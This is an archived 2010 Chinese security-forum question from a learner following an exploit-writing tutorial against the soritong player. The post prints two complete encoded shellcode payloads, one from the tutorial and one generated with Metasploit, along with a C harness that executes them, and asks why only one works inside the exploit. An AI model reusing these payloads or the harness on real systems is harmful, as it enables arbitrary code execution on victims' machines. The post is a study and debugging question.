首页
社区
课程
招聘
[旧帖] [求助]Shellcode运行怪异问题 0.00雪花
发表于: 2010-12-27 10:42 1014

[旧帖] [求助]Shellcode运行怪异问题 0.00雪花

2010-12-27 10:42
1014
测试《Exploit编写系列教程》中的soritong软件,发现使用不同的shellcode,结果完全不一样,但使用vc++6.0都能正确运行两个shellcode。谁知道这是什么原因?
   能在soritong和vc++都能正确运行的shellcode,这也是《Exploit编写系列教程》例子中的shellcode:
   "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
          "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
          "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
          "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
          "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
          "\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37".
          "\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48".
          "\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48".
          "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".
          "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
          "\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48".
          "\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54".
          "\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48".
          "\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43".
          "\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57".
          "\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a".
          "\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b".
          "\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53".
          "\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37".
          "\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49".
          "\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46".
          "\x4e\x36\x43\x46\x42\x50\x5a";
下面是使用msfweb生成的shellcode,不能在soritong中运行,也无法查看内存中是否覆盖有问题,但能使用vc++正常运行:
"\x33\xc9\xb1\x32\xd9\xc8\xbb\x1a\x62\x0a\xcc\xd9\x74\x24" .
"\xf4\x58\x31\x58\x13\x03\x58\x13\x83\xda\x66\xe8\x39\x26" .
"\x8e\x65\xc1\xd6\x4f\x16\x4b\x33\x7e\x04\x2f\x30\xd3\x98" .
"\x3b\x14\xd8\x53\x69\x8c\x6b\x11\xa6\xa3\xdc\x9c\x90\x8a" .
"\xdd\x10\x1d\x40\x1d\x32\xe1\x9a\x72\x94\xd8\x55\x87\xd5" .
"\x1d\x8b\x68\x87\xf6\xc0\xdb\x38\x72\x94\xe7\x39\x54\x93" .
"\x58\x42\xd1\x63\x2c\xf8\xd8\xb3\x9d\x77\x92\x2b\x95\xd0" .
"\x03\x4a\x7a\x03\x7f\x05\xf7\xf0\x0b\x94\xd1\xc8\xf4\xa7" .
"\x1d\x86\xca\x08\x90\xd6\x0b\xae\x4b\xad\x67\xcd\xf6\xb6" .
"\xb3\xac\x2c\x32\x26\x16\xa6\xe4\x82\xa7\x6b\x72\x40\xab" .
"\xc0\xf0\x0e\xaf\xd7\xd5\x24\xcb\x5c\xd8\xea\x5a\x26\xff" .
"\x2e\x07\xfc\x9e\x77\xed\x53\x9e\x68\x49\x0b\x3a\xe2\x7b" .
"\x58\x3c\xa9\x11\x9f\xcc\xd7\x5c\x9f\xce\xd7\xce\xc8\xff" .
"\x5c\x81\x8f\xff\xb6\xe6\x60\x4a\x9a\x4e\xe9\x13\x4e\xd3" .
"\x74\xa4\xa4\x17\x81\x27\x4d\xe7\x76\x37\x24\xe2\x33\xff" .
"\xd4\x9e\x2c\x6a\xdb\x0d\x4c\xbf\xb8\xd0\xde\x23\x3f";

   上面都是以perl语言格式的shellcode,使用c语言测试的程序如下:
char shellcode[]="";
void main()
{
        __asm
        {
                lea eax,shellcode
                push eax
                ret
        }
}

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (1)
雪    币: 37
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
自己顶下
2010-12-29 09:52
0
游客
登录 | 注册 方可回帖
返回
//